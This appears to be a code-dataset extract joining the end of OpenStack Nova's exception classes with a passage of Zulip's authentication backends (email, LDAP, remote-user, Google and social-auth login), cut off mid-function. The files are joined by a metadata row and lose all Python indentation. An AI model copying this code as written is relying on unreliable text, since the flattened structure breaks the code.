class AggregateHostNotFound(NotFound):
message = _("Aggregate %(aggregate_id)s has no host %(host)s.")
class AggregateMetadataNotFound(NotFound):
message = _("Aggregate %(aggregate_id)s has no metadata with "
"key %(metadata_key)s.")
class AggregateHostExists(Duplicate):
message = _("Aggregate %(aggregate_id)s already has host %(host)s.")
class InstanceTypeCreateFailed(NovaException):
message = _("Unable to create instance type")
class InstancePasswordSetFailed(NovaException):
message = _("Failed to set admin password on %(instance)s "
"because %(reason)s")
safe = True
class DuplicateVlan(Duplicate):
message = _("Detected existing vlan with id %(vlan)d")
class CidrConflict(NovaException):
message = _("There was a conflict when trying to complete your request.")
code = 409
class InstanceNotFound(NotFound):
message = _("Instance %(instance_id)s could not be found.")
class InstanceInfoCacheNotFound(NotFound):
message = _("Info cache for instance %(instance_uuid)s could not be "
"found.")
class NodeNotFound(NotFound):
message = _("Node %(node_id)s could not be found.")
class NodeNotFoundByUUID(NotFound):
message = _("Node with UUID %(node_uuid)s could not be found.")
class MarkerNotFound(NotFound):
message = _("Marker %(marker)s could not be found.")
class InvalidInstanceIDMalformed(Invalid):
message = _("Invalid id: %(val)s (expecting \"i-...\").")
class CouldNotFetchImage(NovaException):
message = _("Could not fetch image %(image_id)s")
class CouldNotUploadImage(NovaException):
message = _("Could not upload image %(image_id)s")
class TaskAlreadyRunning(NovaException):
message = _("Task %(task_name)s is already running on host %(host)s")
class TaskNotRunning(NovaException):
message = _("Task %(task_name)s is not running on host %(host)s")
class InstanceIsLocked(InstanceInvalidState):
message = _("Instance %(instance_uuid)s is locked")
class ConfigDriveMountFailed(NovaException):
message = _("Could not mount vfat config drive. %(operation)s failed. "
"Error: %(error)s")
class ConfigDriveUnknownFormat(NovaException):
message = _("Unknown config drive format %(format)s. Select one of "
"iso9660 or vfat.")
class InterfaceAttachFailed(Invalid):
message = _("Failed to attach network adapter device to %(instance)s")
class InterfaceDetachFailed(Invalid):
message = _("Failed to detach network adapter device from %(instance)s")
class InstanceUserDataTooLarge(NovaException):
message = _("User data too large. User data must be no larger than "
"%(maxsize)s bytes once base64 encoded. Your data is "
"%(length)d bytes")
class InstanceUserDataMalformed(NovaException):
message = _("User data needs to be valid base 64.")
class UnexpectedTaskStateError(NovaException):
message = _("unexpected task state: expecting %(expected)s but "
"the actual state is %(actual)s")
class InstanceActionNotFound(NovaException):
message = _("Action for request_id %(request_id)s on instance"
" %(instance_uuid)s not found")
class InstanceActionEventNotFound(NovaException):
message = _("Event %(event)s not found for action id %(action_id)s")
class CryptoCAFileNotFound(FileNotFound):
message = _("The CA file for %(project)s could not be found")
class CryptoCRLFileNotFound(FileNotFound):
message = _("The CRL file for %(project)s could not be found")
class InstanceRecreateNotSupported(Invalid):
message = _('Instance recreate is not implemented by this virt driver.')
class ServiceGroupUnavailable(NovaException):
message = _("The service from servicegroup driver %(driver) is "
"temporarily unavailable.")
class DBNotAllowed(NovaException):
message = _('%(binary)s attempted direct database access which is '
'not allowed by policy')
class UnsupportedVirtType(Invalid):
message = _("Virtualization type '%(virt)s' is not supported by "
"this compute driver")
class UnsupportedHardware(Invalid):
message = _("Requested hardware '%(model)s' is not supported by "
"the '%(virt)s' virt driver")
class Base64Exception(NovaException):
message = _("Invalid Base 64 data for file %(path)s")
| apache-2.0 | 1,228,007,779,956,419,300 | 27.251656 | 79 | 0.67241 | false |
rishig/zulip | zproject/backends.py | 1 | 46330 | # Documentation for Zulip's authentication backends is split across a few places:
#
# * https://zulip.readthedocs.io/en/latest/production/authentication-methods.html and
# zproject/prod_settings_template.py have user-level configuration documentation.
# * https://zulip.readthedocs.io/en/latest/subsystems/auth.html has developer-level
# documentation, especially on testing authentication backends in the Zulip
# development environment.
#
# Django upstream's documentation for authentication backends is also
# helpful background. The most important detail to understand for
# reading this file is that the Django authenticate() function will
# call the authenticate methods of all backends registered in
# settings.AUTHENTICATION_BACKENDS that have a function signature
# matching the args/kwargs passed in the authenticate() call.
import copy
import logging
import magic
from typing import Any, Dict, List, Optional, Set, Tuple, Union
from django_auth_ldap.backend import LDAPBackend, _LDAPUser
from django.contrib.auth import get_backends
from django.contrib.auth.backends import RemoteUserBackend
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import validate_email
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from requests import HTTPError
from social_core.backends.github import GithubOAuth2, GithubOrganizationOAuth2, \
GithubTeamOAuth2
from social_core.backends.azuread import AzureADOAuth2
from social_core.backends.base import BaseAuth
from social_core.backends.oauth import BaseOAuth2
from social_core.pipeline.partial import partial
from social_core.exceptions import AuthFailed, SocialAuthBaseException
from zerver.lib.actions import do_create_user, do_reactivate_user, do_deactivate_user, \
do_update_user_custom_profile_data, validate_email_for_realm
from zerver.lib.avatar import is_avatar_new
from zerver.lib.avatar_hash import user_avatar_content_hash
from zerver.lib.dev_ldap_directory import init_fakeldap
from zerver.lib.request import JsonableError
from zerver.lib.users import check_full_name, validate_user_custom_profile_field
from zerver.models import CustomProfileField, DisposableEmailError, DomainNotAllowedForRealmError, \
EmailContainsPlusError, PreregistrationUser, UserProfile, Realm, custom_profile_fields_for_realm, \
email_allowed_for_realm, get_default_stream_groups, get_user_profile_by_id, remote_user_to_email, \
email_to_username, get_realm, get_user_by_delivery_email, supported_auth_backends
# This first batch of methods is used by other code in Zulip to check
# whether a given authentication backend is enabled for a given realm.
# In each case, we both needs to check at the server level (via
# `settings.AUTHENTICATION_BACKENDS`, queried via
# `django.contrib.auth.get_backends`) and at the realm level (via the
# `Realm.authentication_methods` BitField).
def pad_method_dict(method_dict: Dict[str, bool]) -> Dict[str, bool]:
"""Pads an authentication methods dict to contain all auth backends
supported by the software, regardless of whether they are
configured on this server"""
for key in AUTH_BACKEND_NAME_MAP:
if key not in method_dict:
method_dict[key] = False
return method_dict
def auth_enabled_helper(backends_to_check: List[str], realm: Optional[Realm]) -> bool:
if realm is not None:
enabled_method_dict = realm.authentication_methods_dict()
pad_method_dict(enabled_method_dict)
else:
enabled_method_dict = dict((method, True) for method in Realm.AUTHENTICATION_FLAGS)
pad_method_dict(enabled_method_dict)
for supported_backend in supported_auth_backends():
for backend_name in backends_to_check:
backend = AUTH_BACKEND_NAME_MAP[backend_name]
if enabled_method_dict[backend_name] and isinstance(supported_backend, backend):
return True
return False
def ldap_auth_enabled(realm: Optional[Realm]=None) -> bool:
return auth_enabled_helper(['LDAP'], realm)
def email_auth_enabled(realm: Optional[Realm]=None) -> bool:
return auth_enabled_helper(['Email'], realm)
def password_auth_enabled(realm: Optional[Realm]=None) -> bool:
return ldap_auth_enabled(realm) or email_auth_enabled(realm)
def dev_auth_enabled(realm: Optional[Realm]=None) -> bool:
return auth_enabled_helper(['Dev'], realm)
def google_auth_enabled(realm: Optional[Realm]=None) -> bool:
return auth_enabled_helper(['Google'], realm)
def github_auth_enabled(realm: Optional[Realm]=None) -> bool:
return auth_enabled_helper(['GitHub'], realm)
def any_oauth_backend_enabled(realm: Optional[Realm]=None) -> bool:
"""Used by the login page process to determine whether to show the
'OR' for login with Google"""
return auth_enabled_helper(OAUTH_BACKEND_NAMES, realm)
def require_email_format_usernames(realm: Optional[Realm]=None) -> bool:
if ldap_auth_enabled(realm):
if settings.LDAP_EMAIL_ATTR or settings.LDAP_APPEND_DOMAIN:
return False
return True
def common_get_active_user(email: str, realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
"""This is the core common function used by essentially all
authentication backends to check if there's an active user account
with a given email address in the organization, handling both
user-level and realm-level deactivation correctly.
"""
try:
user_profile = get_user_by_delivery_email(email, realm)
except UserProfile.DoesNotExist:
# If the user doesn't have an account in the target realm, we
# check whether they might have an account in another realm,
# and if so, provide a helpful error message via
# `invalid_subdomain`.
if not UserProfile.objects.filter(delivery_email__iexact=email).exists():
return None
if return_data is not None:
return_data['invalid_subdomain'] = True
return None
if not user_profile.is_active:
if return_data is not None:
if user_profile.is_mirror_dummy:
# Record whether it's a mirror dummy account
return_data['is_mirror_dummy'] = True
return_data['inactive_user'] = True
return None
if user_profile.realm.deactivated:
if return_data is not None:
return_data['inactive_realm'] = True
return None
return user_profile
class ZulipAuthMixin:
"""This common mixin is used to override Django's default behavior for
looking up a logged-in user by ID to use a version that fetches
from memcached before checking the database (avoiding a database
query in most cases).
"""
def get_user(self, user_profile_id: int) -> Optional[UserProfile]:
"""Override the Django method for getting a UserProfile object from
the user_profile_id,."""
try:
return get_user_profile_by_id(user_profile_id)
except UserProfile.DoesNotExist:
return None
class ZulipDummyBackend(ZulipAuthMixin):
"""Used when we want to log you in without checking any
authentication (i.e. new user registration or when otherwise
authentication has already been checked earlier in the process).
We ensure that this backend only ever successfully authenticates
when explicitly requested by including the use_dummy_backend kwarg.
"""
def authenticate(self, *, username: str, realm: Realm,
use_dummy_backend: bool=False,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
if use_dummy_backend:
return common_get_active_user(username, realm, return_data)
return None
class EmailAuthBackend(ZulipAuthMixin):
"""
Email+Password Authentication Backend (the default).
Allows a user to sign in using an email/password pair.
"""
def authenticate(self, *, username: str, password: str,
realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
""" Authenticate a user based on email address as the user name. """
if not password_auth_enabled(realm):
if return_data is not None:
return_data['password_auth_disabled'] = True
return None
if not email_auth_enabled(realm):
if return_data is not None:
return_data['email_auth_disabled'] = True
return None
user_profile = common_get_active_user(username, realm, return_data=return_data)
if user_profile is None:
return None
if user_profile.check_password(password):
return user_profile
return None
class GoogleMobileOauth2Backend(ZulipAuthMixin):
"""
Google Apps authentication for the legacy Android app.
DummyAuthBackend is what's actually used for our modern Google auth,
both for web and mobile (the latter via the mobile_flow_otp feature).
Allows a user to sign in using a Google-issued OAuth2 token.
Ref:
https://developers.google.com/+/mobile/android/sign-in#server-side_access_for_your_app
https://developers.google.com/accounts/docs/CrossClientAuth#offlineAccess
"""
def authenticate(self, *, google_oauth2_token: str, realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
# We lazily import apiclient as part of optimizing the base
# import time for a Zulip management command, since it's only
# used in this one code path and takes 30-50ms to import.
from apiclient.sample_tools import client as googleapiclient
from oauth2client.crypt import AppIdentityError
if return_data is None:
return_data = {}
if not google_auth_enabled(realm=realm):
return_data["google_auth_disabled"] = True
return None
try:
token_payload = googleapiclient.verify_id_token(google_oauth2_token, settings.GOOGLE_CLIENT_ID)
except AppIdentityError:
return None
if token_payload["email_verified"] not in (True, "true"):
return_data["valid_attestation"] = False
return None
return_data["valid_attestation"] = True
return common_get_active_user(token_payload["email"], realm, return_data)
class ZulipRemoteUserBackend(RemoteUserBackend):
"""Authentication backend that reads the Apache REMOTE_USER variable.
Used primarily in enterprise environments with an SSO solution
that has an Apache REMOTE_USER integration. For manual testing, see
https://zulip.readthedocs.io/en/latest/production/authentication-methods.html
See also remote_user_sso in zerver/views/auth.py.
"""
create_unknown_user = False
def authenticate(self, *, remote_user: str, realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
if not auth_enabled_helper(["RemoteUser"], realm):
return None
email = remote_user_to_email(remote_user)
return common_get_active_user(email, realm, return_data=return_data)
def is_valid_email(email: str) -> bool:
try:
validate_email(email)
except ValidationError:
return False
return True
def email_belongs_to_ldap(realm: Realm, email: str) -> bool:
"""Used to make determinations on whether a user's email address is
managed by LDAP. For environments using both LDAP and
Email+Password authentication, we do not allow EmailAuthBackend
authentication for email addresses managed by LDAP (to avoid a
security issue where one create separate credentials for an LDAP
user), and this function is used to enforce that rule.
"""
if not ldap_auth_enabled(realm):
return False
# If we don't have an LDAP domain, it's impossible to tell which
# accounts are LDAP accounts, so treat all of them as LDAP
# accounts
if not settings.LDAP_APPEND_DOMAIN:
return True
# Otherwise, check if the email ends with LDAP_APPEND_DOMAIN
return email.strip().lower().endswith("@" + settings.LDAP_APPEND_DOMAIN)
class ZulipLDAPException(_LDAPUser.AuthenticationFailed):
"""Since this inherits from _LDAPUser.AuthenticationFailed, these will
be caught and logged at debug level inside django-auth-ldap's authenticate()"""
pass
class ZulipLDAPExceptionOutsideDomain(ZulipLDAPException):
pass
class ZulipLDAPConfigurationError(Exception):
pass
LDAP_USER_ACCOUNT_CONTROL_DISABLED_MASK = 2
class ZulipLDAPAuthBackendBase(ZulipAuthMixin, LDAPBackend):
"""Common code between LDAP authentication (ZulipLDAPAuthBackend) and
using LDAP just to sync user data (ZulipLDAPUserPopulator).
To fully understand our LDAP backend, you may want to skim
django_auth_ldap/backend.py from the upstream django-auth-ldap
library. It's not a lot of code, and searching around in that
file makes the flow for LDAP authentication clear.
"""
def __init__(self) -> None:
# Used to initialize a fake LDAP directly for both manual
# and automated testing in a development environment where
# there is no actual LDAP server.
if settings.DEVELOPMENT and settings.FAKE_LDAP_MODE: # nocoverage
init_fakeldap()
# Disable django-auth-ldap's permissions functions -- we don't use
# the standard Django user/group permissions system because they
# are prone to performance issues.
def has_perm(self, user: Optional[UserProfile], perm: Any, obj: Any=None) -> bool:
return False
def has_module_perms(self, user: Optional[UserProfile], app_label: Optional[str]) -> bool:
return False
def get_all_permissions(self, user: Optional[UserProfile], obj: Any=None) -> Set[Any]:
return set()
def get_group_permissions(self, user: Optional[UserProfile], obj: Any=None) -> Set[Any]:
return set()
def django_to_ldap_username(self, username: str) -> str:
if settings.LDAP_APPEND_DOMAIN:
if is_valid_email(username):
if not username.endswith("@" + settings.LDAP_APPEND_DOMAIN):
raise ZulipLDAPExceptionOutsideDomain("Email %s does not match LDAP domain %s." % (
username, settings.LDAP_APPEND_DOMAIN))
return email_to_username(username)
return username
def ldap_to_django_username(self, username: str) -> str:
if settings.LDAP_APPEND_DOMAIN:
return "@".join((username, settings.LDAP_APPEND_DOMAIN))
return username
def sync_avatar_from_ldap(self, user: UserProfile, ldap_user: _LDAPUser) -> None:
if 'avatar' in settings.AUTH_LDAP_USER_ATTR_MAP:
# We do local imports here to avoid import loops
from zerver.lib.upload import upload_avatar_image
from zerver.lib.actions import do_change_avatar_fields
from io import BytesIO
avatar_attr_name = settings.AUTH_LDAP_USER_ATTR_MAP['avatar']
if avatar_attr_name not in ldap_user.attrs: # nocoverage
# If this specific user doesn't have e.g. a
# thumbnailPhoto set in LDAP, just skip that user.
return
ldap_avatar = ldap_user.attrs[avatar_attr_name][0]
avatar_changed = is_avatar_new(ldap_avatar, user)
if not avatar_changed:
# Don't do work to replace the avatar with itself.
return
io = BytesIO(ldap_avatar)
# Structurally, to make the S3 backend happy, we need to
# provide a Content-Type; since that isn't specified in
# any metadata, we auto-detect it.
content_type = magic.from_buffer(copy.deepcopy(io).read()[0:1024], mime=True)
if content_type.startswith("image/"):
upload_avatar_image(io, user, user, content_type=content_type)
do_change_avatar_fields(user, UserProfile.AVATAR_FROM_USER)
# Update avatar hash.
user.avatar_hash = user_avatar_content_hash(ldap_avatar)
user.save(update_fields=["avatar_hash"])
else:
logging.warning("Could not parse %s field for user %s" %
(avatar_attr_name, user.id))
def is_account_control_disabled_user(self, ldap_user: _LDAPUser) -> bool:
"""Implements the userAccountControl check for whether a user has been
disabled in an Active Directory server being integrated with
Zulip via LDAP."""
account_control_value = ldap_user.attrs[settings.AUTH_LDAP_USER_ATTR_MAP['userAccountControl']][0]
ldap_disabled = bool(int(account_control_value) & LDAP_USER_ACCOUNT_CONTROL_DISABLED_MASK)
return ldap_disabled
@classmethod
def get_mapped_name(cls, ldap_user: _LDAPUser) -> Tuple[str, str]:
"""Constructs the user's Zulip full_name and short_name fields from
the LDAP data"""
if "full_name" in settings.AUTH_LDAP_USER_ATTR_MAP:
full_name_attr = settings.AUTH_LDAP_USER_ATTR_MAP["full_name"]
short_name = full_name = ldap_user.attrs[full_name_attr][0]
elif all(key in settings.AUTH_LDAP_USER_ATTR_MAP for key in {"first_name", "last_name"}):
first_name_attr = settings.AUTH_LDAP_USER_ATTR_MAP["first_name"]
last_name_attr = settings.AUTH_LDAP_USER_ATTR_MAP["last_name"]
short_name = ldap_user.attrs[first_name_attr][0]
full_name = short_name + ' ' + ldap_user.attrs[last_name_attr][0]
else:
raise ZulipLDAPException("Missing required mapping for user's full name")
if "short_name" in settings.AUTH_LDAP_USER_ATTR_MAP:
short_name_attr = settings.AUTH_LDAP_USER_ATTR_MAP["short_name"]
short_name = ldap_user.attrs[short_name_attr][0]
return full_name, short_name
def sync_full_name_from_ldap(self, user_profile: UserProfile,
ldap_user: _LDAPUser) -> None:
from zerver.lib.actions import do_change_full_name
full_name, _ = self.get_mapped_name(ldap_user)
if full_name != user_profile.full_name:
try:
full_name = check_full_name(full_name)
except JsonableError as e:
raise ZulipLDAPException(e.msg)
do_change_full_name(user_profile, full_name, None)
def sync_custom_profile_fields_from_ldap(self, user_profile: UserProfile,
ldap_user: _LDAPUser) -> None:
values_by_var_name = {} # type: Dict[str, Union[int, str, List[int]]]
for attr, ldap_attr in settings.AUTH_LDAP_USER_ATTR_MAP.items():
if not attr.startswith('custom_profile_field__'):
continue
var_name = attr.split('custom_profile_field__')[1]
try:
value = ldap_user.attrs[ldap_attr][0]
except KeyError:
# If this user doesn't have this field set then ignore this
# field and continue syncing other fields. `django-auth-ldap`
# automatically logs error about missing field.
continue
values_by_var_name[var_name] = value
fields_by_var_name = {} # type: Dict[str, CustomProfileField]
custom_profile_fields = custom_profile_fields_for_realm(user_profile.realm.id)
for field in custom_profile_fields:
var_name = '_'.join(field.name.lower().split(' '))
fields_by_var_name[var_name] = field
existing_values = {}
for data in user_profile.profile_data:
var_name = '_'.join(data['name'].lower().split(' ')) # type: ignore # data field values can also be int
existing_values[var_name] = data['value']
profile_data = [] # type: List[Dict[str, Union[int, str, List[int]]]]
for var_name, value in values_by_var_name.items():
try:
field = fields_by_var_name[var_name]
except KeyError:
raise ZulipLDAPException('Custom profile field with name %s not found.' % (var_name,))
if existing_values.get(var_name) == value:
continue
result = validate_user_custom_profile_field(user_profile.realm.id, field, value)
if result is not None:
raise ZulipLDAPException('Invalid data for %s field: %s' % (var_name, result))
profile_data.append({
'id': field.id,
'value': value,
})
do_update_user_custom_profile_data(user_profile, profile_data)
def get_or_build_user(self, username: str,
ldap_user: _LDAPUser) -> Tuple[UserProfile, bool]:
"""This is used only in non-authentication contexts such as:
./manage.py sync_ldap_user_data
In authentication contexts, this is overriden in ZulipLDAPAuthBackend.
"""
(user, built) = super().get_or_build_user(username, ldap_user)
self.sync_avatar_from_ldap(user, ldap_user)
self.sync_full_name_from_ldap(user, ldap_user)
self.sync_custom_profile_fields_from_ldap(user, ldap_user)
if 'userAccountControl' in settings.AUTH_LDAP_USER_ATTR_MAP:
user_disabled_in_ldap = self.is_account_control_disabled_user(ldap_user)
if user_disabled_in_ldap and user.is_active:
logging.info("Deactivating user %s because they are disabled in LDAP." %
(user.email,))
do_deactivate_user(user)
return (user, built)
if not user_disabled_in_ldap and not user.is_active:
logging.info("Reactivating user %s because they are not disabled in LDAP." %
(user.email,))
do_reactivate_user(user)
return (user, built)
class ZulipLDAPAuthBackend(ZulipLDAPAuthBackendBase):
REALM_IS_NONE_ERROR = 1
def authenticate(self, *, username: str, password: str, realm: Realm,
prereg_user: Optional[PreregistrationUser]=None,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
self._realm = realm
self._prereg_user = prereg_user
if not ldap_auth_enabled(realm):
return None
try:
username = self.django_to_ldap_username(username)
except ZulipLDAPExceptionOutsideDomain:
if return_data is not None:
return_data['outside_ldap_domain'] = True
return None
# Call into (ultimately) the django-auth-ldap authenticate
# function. This will check the username/password pair
# against the LDAP database, and assuming those are correct,
# end up calling `self.get_or_build_user` with the
# authenticated user's data from LDAP.
return ZulipLDAPAuthBackendBase.authenticate(self,
request=None,
username=username,
password=password)
def get_or_build_user(self, username: str, ldap_user: _LDAPUser) -> Tuple[UserProfile, bool]:
"""The main function of our authentication backend extension of
django-auth-ldap. When this is called (from `authenticate`),
django-auth-ldap will already have verified that the provided
username and password match those in the LDAP database.
This function's responsibility is to check (1) whether the
email address for this user obtained from LDAP has an active
account in this Zulip realm. If so, it will log them in.
Otherwise, to provide a seamless Single Sign-On experience
with LDAP, this function can automatically create a new Zulip
user account in the realm (assuming the realm is configured to
allow that email address to sign up).
"""
return_data = {} # type: Dict[str, Any]
if settings.LDAP_EMAIL_ATTR is not None:
# Get email from ldap attributes.
if settings.LDAP_EMAIL_ATTR not in ldap_user.attrs:
return_data["ldap_missing_attribute"] = settings.LDAP_EMAIL_ATTR
raise ZulipLDAPException("LDAP user doesn't have the needed %s attribute" % (
settings.LDAP_EMAIL_ATTR,))
username = ldap_user.attrs[settings.LDAP_EMAIL_ATTR][0]
if 'userAccountControl' in settings.AUTH_LDAP_USER_ATTR_MAP: # nocoverage
ldap_disabled = self.is_account_control_disabled_user(ldap_user)
if ldap_disabled:
# Treat disabled users as deactivated in Zulip.
return_data["inactive_user"] = True
raise ZulipLDAPException("User has been deactivated")
user_profile = common_get_active_user(username, self._realm, return_data)
if user_profile is not None:
# An existing user, successfully authed; return it.
return user_profile, False
if return_data.get("inactive_realm"):
# This happens if there is a user account in a deactivated realm
raise ZulipLDAPException("Realm has been deactivated")
if return_data.get("inactive_user"):
raise ZulipLDAPException("User has been deactivated")
# An invalid_subdomain `return_data` value here is ignored,
# since that just means we're trying to create an account in a
# second realm on the server (`ldap_auth_enabled(realm)` would
# have been false if this user wasn't meant to have an account
# in this second realm).
if self._realm.deactivated:
# This happens if no account exists, but the realm is
# deactivated, so we shouldn't create a new user account
raise ZulipLDAPException("Realm has been deactivated")
# Makes sure that email domain hasn't be restricted for this
# realm. The main thing here is email_allowed_for_realm; but
# we also call validate_email_for_realm just for consistency,
# even though its checks were already done above.
try:
email_allowed_for_realm(username, self._realm)
validate_email_for_realm(self._realm, username)
except DomainNotAllowedForRealmError:
raise ZulipLDAPException("This email domain isn't allowed in this organization.")
except (DisposableEmailError, EmailContainsPlusError):
raise ZulipLDAPException("Email validation failed.")
# We have valid LDAP credentials; time to create an account.
full_name, short_name = self.get_mapped_name(ldap_user)
try:
full_name = check_full_name(full_name)
except JsonableError as e:
raise ZulipLDAPException(e.msg)
opts = {} # type: Dict[str, Any]
if self._prereg_user:
invited_as = self._prereg_user.invited_as
opts['prereg_user'] = self._prereg_user
opts['is_realm_admin'] = invited_as == PreregistrationUser.INVITE_AS['REALM_ADMIN']
opts['is_guest'] = invited_as == PreregistrationUser.INVITE_AS['GUEST_USER']
opts['default_stream_groups'] = get_default_stream_groups(self._realm)
user_profile = do_create_user(username, None, self._realm, full_name, short_name, **opts)
self.sync_avatar_from_ldap(user_profile, ldap_user)
self.sync_custom_profile_fields_from_ldap(user_profile, ldap_user)
return user_profile, True
class ZulipLDAPUserPopulator(ZulipLDAPAuthBackendBase):
"""Just like ZulipLDAPAuthBackend, but doesn't let you log in. Used
for syncing data like names, avatars, and custom profile fields
from LDAP in `manage.py sync_ldap_user_data` as well as in
registration for organizations that use a different SSO solution
for managing login (often via RemoteUserBackend).
"""
def authenticate(self, *, username: str, password: str, realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
return None
def sync_user_from_ldap(user_profile: UserProfile) -> bool:
backend = ZulipLDAPUserPopulator()
updated_user = backend.populate_user(backend.django_to_ldap_username(user_profile.email))
if not updated_user:
if settings.LDAP_DEACTIVATE_NON_MATCHING_USERS:
do_deactivate_user(user_profile)
return False
return True
# Quick tool to test whether you're correctly authenticating to LDAP
def query_ldap(email: str) -> List[str]:
values = []
backend = next((backend for backend in get_backends() if isinstance(backend, LDAPBackend)), None)
if backend is not None:
ldap_attrs = _LDAPUser(backend, backend.django_to_ldap_username(email)).attrs
if ldap_attrs is None:
values.append("No such user found")
else:
for django_field, ldap_field in settings.AUTH_LDAP_USER_ATTR_MAP.items():
value = ldap_attrs.get(ldap_field, ["LDAP field not present", ])[0]
if django_field == "avatar":
if isinstance(value, bytes):
value = "(An avatar image file)"
values.append("%s: %s" % (django_field, value))
if settings.LDAP_EMAIL_ATTR is not None:
values.append("%s: %s" % ('email', ldap_attrs[settings.LDAP_EMAIL_ATTR][0]))
else:
values.append("LDAP backend not configured on this server.")
return values
class DevAuthBackend(ZulipAuthMixin):
"""Allow logging in as any user without a password. This is used for
convenience when developing Zulip, and is disabled in production."""
def authenticate(self, *, dev_auth_username: str, realm: Realm,
return_data: Optional[Dict[str, Any]]=None) -> Optional[UserProfile]:
if not dev_auth_enabled(realm):
return None
return common_get_active_user(dev_auth_username, realm, return_data=return_data)
def redirect_deactivated_user_to_login() -> HttpResponseRedirect:
# Specifying the template name makes sure that the user is not redirected to dev_login in case of
# a deactivated account on a test server.
login_url = reverse('zerver.views.auth.login_page', kwargs = {'template_name': 'zerver/login.html'})
redirect_url = login_url + '?is_deactivated=true'
return HttpResponseRedirect(redirect_url)
def social_associate_user_helper(backend: BaseAuth, return_data: Dict[str, Any],
*args: Any, **kwargs: Any) -> Optional[UserProfile]:
"""Responsible for doing the Zulip-account lookup and validation parts
of the Zulip Social auth pipeline (similar to the authenticate()
methods in most other auth backends in this file).
Returns a UserProfile object for successful authentication, and None otherwise.
"""
subdomain = backend.strategy.session_get('subdomain')
try:
realm = get_realm(subdomain)
except Realm.DoesNotExist:
return_data["invalid_realm"] = True
return None
return_data["realm_id"] = realm.id
if not auth_enabled_helper([backend.auth_backend_name], realm):
return_data["auth_backend_disabled"] = True
return None
if 'auth_failed_reason' in kwargs.get('response', {}):
return_data["social_auth_failed_reason"] = kwargs['response']["auth_failed_reason"]
return None
elif hasattr(backend, 'get_verified_emails'):
# Some social backends, like GitHubAuthBackend, don't
# guarantee that the `details` data is validated (i.e., it's
# possible users can put any string they want in the "email"
# field of the `details` object). For those backends, we have
# custom per-backend code to properly fetch only verified
# email addresses from the appropriate third-party API.
verified_emails = backend.get_verified_emails(*args, **kwargs)
verified_emails_length = len(verified_emails)
if verified_emails_length == 0:
# TODO: Provide a nice error message screen to the user
# for this case, rather than just logging a warning.
logging.warning("Social auth (%s) failed because user has no verified emails" %
(backend.auth_backend_name,))
return_data["email_not_verified"] = True
return None
if verified_emails_length == 1:
chosen_email = verified_emails[0]
else:
chosen_email = backend.strategy.request_data().get('email')
if not chosen_email:
return render(backend.strategy.request, 'zerver/social_auth_select_email.html', context = {
'primary_email': verified_emails[0],
'verified_non_primary_emails': verified_emails[1:],
'backend': 'github'
})
try:
validate_email(chosen_email)
except ValidationError:
return_data['invalid_email'] = True
return None
if chosen_email not in verified_emails:
# If a user edits the submit value for the choose email form, we might
# end up with a wrong email associated with the account. The below code
# takes care of that.
logging.warning("Social auth (%s) failed because user has no verified"
" emails associated with the account" %
(backend.auth_backend_name,))
return_data["email_not_associated"] = True
return None
validated_email = chosen_email
else: # nocoverage
# This code path isn't used by GitHubAuthBackend
validated_email = kwargs["details"].get("email")
if not validated_email: # nocoverage
# This code path isn't used with GitHubAuthBackend, but may be relevant for other
# social auth backends.
return_data['invalid_email'] = True
return None
return_data["valid_attestation"] = True
return_data['validated_email'] = validated_email
user_profile = common_get_active_user(validated_email, realm, return_data)
if 'fullname' in kwargs["details"]:
return_data["full_name"] = kwargs["details"]["fullname"]
else:
# If we add support for any of the social auth backends that
# don't provide this feature, we'll need to add code here.
raise AssertionError("Social auth backend doesn't provide fullname")
return user_profile
@partial
def social_auth_associate_user(
backend: BaseAuth,
*args: Any,
**kwargs: Any) -> Union[HttpResponse, Dict[str, Any]]:
"""A simple wrapper function to reformat the return data from
social_associate_user_helper as a dictionary. The
python-social-auth infrastructure will then pass those values into
later stages of settings.SOCIAL_AUTH_PIPELINE, such as
social_auth_finish, as kwargs.
"""
partial_token = backend.strategy.request_data().get('partial_token')
return_data = {} # type: Dict[str, Any]
user_profile = social_associate_user_helper(
backend, return_data, *args, **kwargs)
if type(user_profile) == HttpResponse:
return user_profile
else:
return {'user_profile': user_profile,
'return_data': return_data,
'partial_token': partial_token,
'partial_backend_name': backend}
def social_auth_finish(backend: Any,
details: Dict[str, Any],
response: HttpResponse,
*args: Any,
**kwargs: Any) -> Optional[UserProfile]:
"""Given the determination in social_auth_associate_user for whether
the user should be authenticated, this takes care of actually
logging in the user (if appropriate) and redirecting the browser
to the appropriate next page depending on the situation. Read the
comments below as well as login_or_register_remote_user in
`zerver/views/auth.py` for the details on how that dispatch works.
"""
from zerver.views.auth import (login_or_register_remote_user,
redirect_and_log_into_subdomain)
user_profile = kwargs['user_profile']
return_data = kwargs['return_data']
no_verified_email = return_data.get("email_not_verified")
auth_backend_disabled = return_data.get('auth_backend_disabled')
inactive_user = return_data.get('inactive_user')
inactive_realm = return_data.get('inactive_realm')
invalid_realm = return_data.get('invalid_realm')
invalid_email = return_data.get('invalid_email')
auth_failed_reason = return_data.get("social_auth_failed_reason")
email_not_associated = return_data.get("email_not_associated")
if invalid_realm:
from zerver.views.auth import redirect_to_subdomain_login_url
return redirect_to_subdomain_login_url()
if inactive_user:
return redirect_deactivated_user_to_login()
if auth_backend_disabled or inactive_realm or no_verified_email or email_not_associated:
# Redirect to login page. We can't send to registration
# workflow with these errors. We will redirect to login page.
return None
if invalid_email:
# In case of invalid email, we will end up on registration page.
# This seems better than redirecting to login page.
logging.warning(
"{} got invalid email argument.".format(backend.auth_backend_name)
)
return None
if auth_failed_reason:
logging.info(auth_failed_reason)
return None
# Structurally, all the cases where we don't have an authenticated
# email for the user should be handled above; this assertion helps
# prevent any violations of that contract from resulting in a user
# being incorrectly authenticated.
assert return_data.get('valid_attestation') is True
strategy = backend.strategy # type: ignore # This comes from Python Social Auth.
email_address = return_data['validated_email']
full_name = return_data['full_name']
is_signup = strategy.session_get('is_signup') == '1'
redirect_to = strategy.session_get('next')
